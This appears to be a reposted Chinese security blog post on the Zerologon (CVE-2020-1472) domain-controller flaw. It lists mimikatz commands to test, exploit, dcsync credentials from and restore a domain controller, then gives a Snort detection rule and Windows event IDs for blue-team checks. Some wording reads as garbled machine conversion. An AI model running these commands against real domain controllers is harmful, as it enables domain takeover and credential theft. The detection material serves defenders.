mimikatz利用zerologon攻击域控服务器相关命令（附蓝队自查方案）

0x01 前言

mimikatz 20200918版本支持经过zerologon漏洞攻击域控服务器。下载连接以下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix

官方利用截图以下

mimikatz相关命令

1. lsadump::zerologon /target:dc.hacke.testlab /account:dc$poc
2. lsadump::zerologon /target:dc.hacke.testlab /account:dc$ /exploit 经过zerologon漏洞攻击域控服务器
3. lsadump::dcsync
4. lsadump::postzerologon /target:conttosson.locl /account:dc$ #恢复密码

snort 检测规则

alert tcp any any -> any ![139,445] (msg:"Possible Mimikatz Zerologon Attempt"; flow:established,to_server; content:"|00|"; offset:2; content:"|0f 00|"; distance:22; within:2; fast_pattern; content:"|00 00 00 00 00 00 00 00 ff ff 2f 21|"; within:90; reference:url,https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916; classtype:attempted-admin; sid:20166330; rev:2; metadata:created_at 2020_09_19;)

pcap包

利用zerologon漏洞攻击域控的数据包，方便同窗们写完规则作测试pcap github下载地址

windows事件管理器自查

在未打补丁的域控，重点查看windows事件管理器中，eventid为4742或者4624, 5805

在windows 8月更新中，新增事件ID 5829，5827，5828，5830，5831。蓝队能够重点关注这几个事件ID以方便自查

1. 当在初始部署阶段容许存在漏洞的Netlogon安全通道链接时，将生成事件ID 5829。
2. 管理员能够监控事件ID 5827和5828，这些事件ID在存在漏洞的Netlogon链接被拒绝时触发
3. 5830，5831  若是“域控制器：容许易受攻击的Netlogon安全通道链接”组策略容许链接。

mimikatz经过zerologon攻击成功后，将会留下事件id为4648。

参考

1. How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc
2. Detecting the Zerologon vulnerability in LogPoint     https://www.logpoint.com/en/blog/detecting-zerologon-vulnerability-in-logpoint/
   
3. https://gist.githubusercontent.com/silence-is-best/435ddb388f872b1a2e332b6239e9150b/raw/8064d33f62d5983130d3d946aac28ea00aaf6c4a/gistfile1.txt

禁止非法，后果自负

欢迎关注公众号：web安全工具库

本文分享自微信公众号 - web安全工具库（websec-tools）。
若有侵权，请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”，欢迎正在阅读的你也加入，一块儿分享。